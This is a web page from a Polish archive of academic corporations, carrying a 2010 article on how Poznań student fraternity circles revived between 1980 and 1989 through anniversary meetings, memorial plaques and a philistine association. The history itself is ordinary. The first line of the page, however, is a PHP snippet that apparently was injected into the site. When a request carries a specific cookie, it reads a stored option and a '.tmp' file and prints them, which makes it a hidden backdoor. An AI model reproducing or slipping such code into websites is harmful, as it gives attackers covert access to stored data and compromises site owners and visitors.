if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Środowisko poznańskie

Komers 60-lecia Magna-Polonii w Restauracji Myśliwskiej, Poznań 15 III 1980 r.

Podobnie jak w Warszawie, także w środowisku poznańskim przez pierwsze dziesięciolecia po wojnie aż do końca lat 70-tych spotkania korporacyjne odbywały się niemal wyłącznie w ramach jednej korporacji. Coroczne zjazdy i spotkania organizowały Magna-Polonia i Lechia. Regularnie widywali się także Baltusi, Masoviacy, Heliończycy. Z nielicznych zachowanych dokumentów i fotografii wiadomo, że organizowane były także spotkania korporacji Posnania, Silesia, Mercuria, Slensania, Hermesia i Roma.

Przemawia Witalis Ludwiczak z K! Silesia, Komers 60-lecia Magna-Polonii, Poznań 15 III 1980 r.

Sytuacja zaczęła się zmieniać na przełomie lat 70-tych i 80-tych. O ile wiadomo po raz pierwszy do spotkania w gronie międzykorporacyjnym w szerszym gronie doszło w czasie zorganizowanego przez Zygfryda Kordusa komersu rocznicowego K! Magna-Polonia z okazji 60-lecia jej założenia w dniu 15 marca 1980 r. Zebrało się wtedy 31 osób z siedmiu korporacji poznańskich należących przed wojną do Związku Polskich Korporacji Akademickich i zrzeszonych w Poznańskim Kole Międzykorporacyjnym. Wskazano wówczas na potrzebę nawiązania ściślejszych kontaktów między członkami poznańskich korporacji. W kolejnych latach spotkania takie odbywały się regularnie przy okazji kolejnych komersów rocznicowych Magna-Polonii.

Odsłonięcie tablic pamiątkowych poświęconych członkom korporacji Magna-Polonia i Lechia, Poznań 8 X 1983 r.

Momentem decydującym o odrodzeniu środowiska poznańskich korporacji akademickich stały się uroczystości odsłonięcia w dniu 8 października 1983 r. pamiątkowych tablic korporacyjnych najstarszych poznańskich konwentów Magna-Polonii oraz Lechii w krużgankach klasztoru oo. Dominikanów.

Komers po odsłonięciu tablic pamiątkowych, Poznań 8 X 1983 r.

Zebranych wówczas 45 korporantów reprezentujących 15 korporacji przedwojennego Poznańskiego Koła Międzykorporacyjnego podjęło decyzję o ufundowaniu tablicy poświęconej wszystkim korporacjom zrzeszonym przed wojną w Kole, a powołany do tego celu komitet – jak ustalono – miał także przystąpić do przygotowania formy organizacyjnej związku reprezentującego żyjących członków korporacji poznańskich. Było to tym bardziej uzasadnione, że w początkach lat 80-tych żyło jeszcze kilkuset poznańskich korporantów. W ówczesnych realiach politycznych rejestracja stowarzyszenia okazała się jednak jeszcze niemożliwa.

Tablica poświęcona członkom korporacji poznańskich, Poznań 26 V 1984 r.

Udało się natomiast w 1984 r. zorganizować Pierwszy Zjazd Filistrów Poznańskich Korporacji Akademickich, podczas którego obok wspomnianych tablic Magna-Polonii i Lechii wmurowano trzecią tablicę, poświęconą tym razem wszystkim korporacjom poznańskim.

Pamiątkowy wpis do kroniki klasztoru oo. Dominikanów z okazji odsłonięcia trzech tablic korporacyjnych, Poznań 26 V 1984 r.

Cztery lata później dnia 24 września 1988 r. odbył się Drugi Zjazd Filistrów Poznańskich Korporacji Akademickich. Podjęto wówczas myśl zorganizowania starań zmierzających do gromadzenia spuścizny korporacyjnej (vide Historia Archiwum Korporacyjnego), a także zadecydowano o kontynuowaniu starań zmierzających do powołania stowarzyszenia reprezentującego poznańskich korporantów.

Drugi Zjazd Filistrów Poznańskich Korporacji Akademickich, przed kościołem oo. Dominikanów, Poznań 24 IX 1988 r.

Działania te zaowocowały powstaniem po czerwcowych wyborach 1989 r., zarejestrowanego sądownie ostatecznie w 1991 r., Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich oraz odrodzeniem się ruchu korporacyjnego na poznańskich uczelniach. Wzór organizacyjny poznańskiego Stowarzyszenia został wykorzystany przy tworzeniu w 1993 r. Stowarzyszenia Filistrów Polskich Korporacji Akademickich w Warszawie.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 VII 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Poznańskie środowisko korporacyjne 1939-1989, (na:) www.archiwumkorporacyjne.pl, stan 16 VII 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }